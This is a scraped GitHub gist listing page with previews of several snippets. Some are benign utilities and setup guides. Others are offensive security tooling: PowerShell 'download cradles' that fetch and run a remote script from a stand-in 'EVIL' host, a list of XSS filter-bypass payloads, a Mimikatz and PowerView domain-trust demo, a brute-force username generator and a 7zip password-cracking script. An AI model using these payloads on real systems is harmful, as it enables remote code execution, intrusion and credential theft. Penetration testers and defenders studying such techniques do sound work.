Skip to content

Instantly share code, notes, and snippets.

View jimmy-ly00's full-sized avatar

Jimmy jimmy-ly00

View GitHub Profile
@douglas
douglas / update_git_repos.sh
Created October 14, 2011 15:04
Update all git repositories under a base directory
#!/bin/bash
# store the current dir
CUR_DIR=$(pwd)
# Let the person running the script know what's going on.
echo "\n\033[1mPulling in latest changes for all repositories...\033[0m\n"
# Find all git repositories and update it to the master latest revision
for i in $(find . -name ".git" | cut -c 3-); do
@btoews
btoews / merger.py
Created May 17, 2012 16:55
Merging Nessus Files
# file: merger.py
# based off: http://cmikavac.net/2011/07/09/merging-multiple-nessus-scans-python-script/
# by: mastahyeti
import xml.etree.ElementTree as etree
import shutil
import os
first = 1
for fileName in os.listdir("."):
@UniIsland
UniIsland / SimpleHTTPServerWithUpload.py
Created August 14, 2012 04:01
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
@superkojiman
superkojiman / namemash.py
Last active June 17, 2024 18:07
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''
@bcoles
bcoles / 7zip-jtr.sh
Last active April 23, 2024 19:17
7zip-JTR Decrypt Script
#!/bin/bash
# 7zip-JTR Decrypt Script
#
# Clone of JTR Decrypt Scripts by synacl modified for 7zip
# - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/
# - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/
echo "7zip-JTR Decrypt Script";
if [ $# -ne 2 ]
then
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active June 18, 2024 17:59
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active June 21, 2024 14:13
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@gbaman
gbaman / HowToOTGFast.md
Last active May 14, 2024 10:26
Simple guide for setting up OTG modes on the Raspberry Pi Zero, the fast way!

Setting up Pi Zero OTG - The quick way (No USB keyboard, mouse, HDMI monitor needed)

More details - http://blog.gbaman.info/?p=791

For this method, alongside your Pi Zero, MicroUSB cable and MicroSD card, only an additional computer is required, which can be running Windows (with Bonjour, iTunes or Quicktime installed), Mac OS or Linux (with Avahi Daemon installed, for example Ubuntu has it built in).
1. Flash Raspbian Jessie full or Raspbian Jessie Lite onto the SD card.
2. Once Raspbian is flashed, open up the boot partition (in Windows Explorer, Finder etc) and add to the bottom of the config.txt file dtoverlay=dwc2 on a new line, then save the file.
3. If using a recent release of Jessie (Dec 2016 onwards), then create a new file simply called ssh in the SD card as well. By default SSH i

@btfak
btfak / useHexo.md
Created May 26, 2016 09:41
How to use Hexo and deploy to GitHub Pages
@HarmJ0y
HarmJ0y / 44con_demo.ps1
Created September 17, 2016 21:00
Demo for the 44con "Trusts You Might Have Missed" presentation
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1
# map all reachable domain trusts
Invoke-MapDomainTrust
# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName